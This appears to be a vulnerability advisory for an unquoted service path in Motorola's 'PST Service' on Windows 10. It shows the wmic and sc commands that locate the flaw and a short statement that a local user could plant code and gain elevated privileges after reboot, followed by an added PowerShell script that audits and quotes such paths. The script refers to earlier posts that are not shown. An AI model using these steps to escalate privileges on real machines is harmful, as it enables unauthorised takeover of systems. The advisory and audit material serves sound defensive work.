# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ForwardDaemon" | findstr /i /v """

PST Service  C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe  Auto

C:\Users\MISTI>sc qc "PST Service"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: PST Service
        TIPO               : 110  WIN32_OWN_PROCESS (interactive)
        TIPO_INICIO        : 2    AUTO_START
        CONTROL_ERROR      : 1    NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : PST Service
        DEPENDENCIAS       : lanmanworkstation
        NOMBRE_INICIO_SERVICIO: LocalSystem

#Exploit:

A successful attempt would cause the local user to be able to insert their code in the system root path undetected by the OS or other security applications and elevate his privileges after reboot.
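The check a defender would run for the condition reported in the unquoted service path posts above (items 13 and 15 through 25), as an added PowerShell example that is not code from any of those posts or vendors; the function names are this example's own and the sample paths are constructed.

```powershell
# Added example, not from the posts above: audit (and optionally fix) services whose
# ImagePath is unquoted and contains a space. Function names are this example's own.

function Get-ServiceExePart {
    # Executable portion of a service command line: up to and including the first ".exe";
    # if there is none, the whole string (arguments cannot be told apart then).
    param([string]$PathName)
    $p = $PathName.Trim()
    $i = $p.IndexOf('.exe', [System.StringComparison]::OrdinalIgnoreCase)
    if ($i -ge 0) { return $p.Substring(0, $i + 4) }
    return $p
}

function Test-UnquotedServicePath {
    # True when the path is not wrapped in quotes and its executable part contains a space,
    # so the service control manager tries "C:\Program.exe", "C:\Program Files (x86)\HP.exe", ... first.
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $false }
    if ($PathName.TrimStart().StartsWith('"')) { return $false }
    return (Get-ServiceExePart $PathName).Contains(' ')
}

function ConvertTo-QuotedServicePath {
    # Wraps only the executable part in quotes and leaves any arguments untouched.
    param([string]$PathName)
    $exe = Get-ServiceExePart $PathName
    $rest = $PathName.Trim().Substring($exe.Length)
    return "`"$exe`"$rest"
}

function Get-UnquotedServicePathFinding {
    # Lists auto-start services with an unquoted, space-containing path. With -Fix (needs
    # an elevated shell) it rewrites ImagePath in the registry, the same change
    # "sc config <name> binPath=" makes; the service must be restarted afterwards.
    param([switch]$Fix)
    Get-CimInstance Win32_Service | Where-Object {
        $_.StartMode -eq 'Auto' -and (Test-UnquotedServicePath $_.PathName)
    } | ForEach-Object {
        $fixed = ConvertTo-QuotedServicePath $_.PathName
        if ($Fix) {
            Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$($_.Name)" `
                -Name ImagePath -Value $fixed -Type ExpandString
        }
        [pscustomobject]@{ Name = $_.Name; StartName = $_.StartName
                           PathName = $_.PathName; FixedPath = $fixed; Fixed = [bool]$Fix }
    }
}

# Constructed samples in the shapes seen in the advisories above
$samples = @(
    'C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe',              # unquoted, space in exe path
    'C:\Program Files\Winstep\WsxService',                                   # unquoted, no ".exe" at all
    '"C:\Program Files\Syncplify\Syncplify.me Server!\SMWebRestSvc.exe"',   # already quoted
    'C:\Windows\system32\svchost.exe -k netsvcs'                            # space only in the arguments
)
foreach ($s in $samples) { '{0,-5} {1}' -f (Test-UnquotedServicePath $s), $s }

Get-UnquotedServicePathFinding | Format-Table -AutoSize   # read-only audit of this host; add -Fix to quote
```

Flagged services that run as LocalSystem and live under a directory writable by non-administrators are the ones that need the fix first; quoting the path removes the ambiguity the advisories rely on.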